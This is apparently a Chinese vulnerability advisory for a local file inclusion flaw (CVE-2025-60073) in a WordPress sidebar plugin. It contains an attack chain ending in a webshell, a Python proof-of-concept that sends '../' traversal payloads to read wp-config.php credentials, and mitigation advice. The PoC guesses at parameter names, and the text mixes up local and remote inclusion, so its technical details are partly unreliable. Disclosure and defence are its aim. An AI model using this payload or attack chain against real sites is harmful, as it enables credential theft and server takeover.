WordPress Responsive Sidebar插件本地文件包含漏洞(CVE-2025-60073)

漏洞信息

漏洞编号

CVE-2025-60073

漏洞类型

本地文件包含(LFI)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Processby Responsive Sidebar WordPress插件

漏洞概述

CVE-2025-60073是WordPress平台下Responsive Sidebar插件中的一个高危安全漏洞，CVSS评分达到7.5分。该漏洞属于PHP远程文件包含（Remote File Inclusion）类型，具体表现为PHP程序中对文件名缺乏适当的控制机制，允许攻击者通过构造恶意请求包含服务器本地文件。此漏洞影响Responsive Sidebar插件从n/a版本到1.2.2的所有版本，攻击者无需认证即可利用此漏洞发起攻击，但需要一定的用户交互。由于该插件在WordPress中被广泛使用，漏洞可能影响大量使用该插件的网站。攻击者可通过此漏洞读取服务器上的敏感配置文件，如wp-config.php，从而获取数据库凭证、API密钥等敏感信息，进一步可能导致完全接管网站。漏洞由Patchstack团队的安全研究人员发现并报告，披露日期为2025年11月6日。

技术细节

该漏洞存在于Responsive Sidebar插件的文件包含逻辑中，攻击者可以通过操控插件的某个参数来包含任意本地文件。具体来说，插件在处理用户请求时，未对传入的文件路径进行严格的输入验证和过滤，允许攻击者使用目录遍历字符（如../）来访问服务器上的敏感文件。在PHP应用程序中，文件包含函数（如include、require、include_once、require_once）在使用用户可控的输入作为文件路径时，如果没有进行充分的清理和验证，就会产生文件包含漏洞。攻击者通常会尝试包含日志文件、/proc/self/environ等文件来执行任意代码，或者包含wp-config.php等配置文件来获取数据库凭证。CVSS向量显示攻击复杂度为高（AC:H），表明利用该漏洞需要特定条件或绕过某些安全措施。用户交互要求为必需（UI:R），意味着需要管理员或其他用户执行某些操作才能触发攻击路径。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标网站使用的WordPress版本和Responsive Sidebar插件版本，确认插件版本 <= 1.2.2

STEP 2

步骤2: 漏洞探测

攻击者向目标插件发送带有目录遍历payload的HTTP请求，探测可利用的参数（如file、path等）

STEP 3

步骤3: 文件读取

成功利用LFI漏洞后，攻击者读取服务器敏感文件，如wp-config.php获取数据库凭证，或/etc/passwd获取系统信息

STEP 4

步骤4: 权限提升

通过读取日志文件或/proc/self/environ，结合LFI将恶意代码注入日志，然后包含日志文件执行任意代码

STEP 5

步骤5: 完全控制

获取Webshell后，攻击者可以完全控制服务器，窃取数据、安装后门、横向移动等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-60073 PoC - WordPress Responsive Sidebar LFI
# Target: WordPress site with Responsive Sidebar plugin <= 1.2.2

def check_vulnerability(target_url):
    """
    Check if the target is vulnerable to CVE-2025-60073
    """
    # Try to read wp-config.php which contains database credentials
    payload = '../../../../../../../../wp-config.php'
    
    # Common parameter names used by the plugin
    params = [
        'file',
        'path',
        'page',
        'view',
        'action'
    ]
    
    for param in params:
        try:
            url = f"{target_url}/wp-content/plugins/responsive-sidebar/"
            test_url = f"{url}?{param}={payload}"
            
            response = requests.get(test_url, timeout=10)
            
            # Check if wp-config.php content is leaked
            if 'DB_NAME' in response.text and 'DB_USER' in response.text:
                print(f"[+] VULNERABLE! Found wp-config.php content via parameter: {param}")
                return True
                
            # Alternative check for other sensitive files
            if '<?php' in response.text:
                print(f"[*] Potential LFI via parameter: {param}")
                
        except requests.RequestException as e:
            print(f"[-] Error testing {param}: {e}")
    
    return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://example.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    check_vulnerability(target)

影响范围

Responsive Sidebar <= 1.2.2

防御指南

临时缓解措施

在官方发布修复补丁之前，建议采取以下临时缓解措施：1）立即禁用Responsive Sidebar插件；2）使用Web应用防火墙（WAF）规则阻止包含../等目录遍历字符的请求；3）限制PHP配置文件中的allow_url_include为Off；4）通过.htaccess或Nginx配置限制对wp-content目录的直接访问；5）启用日志监控，及时发现异常的文件包含请求；6）考虑使用文件完整性监控工具检测对配置文件的未授权访问尝试。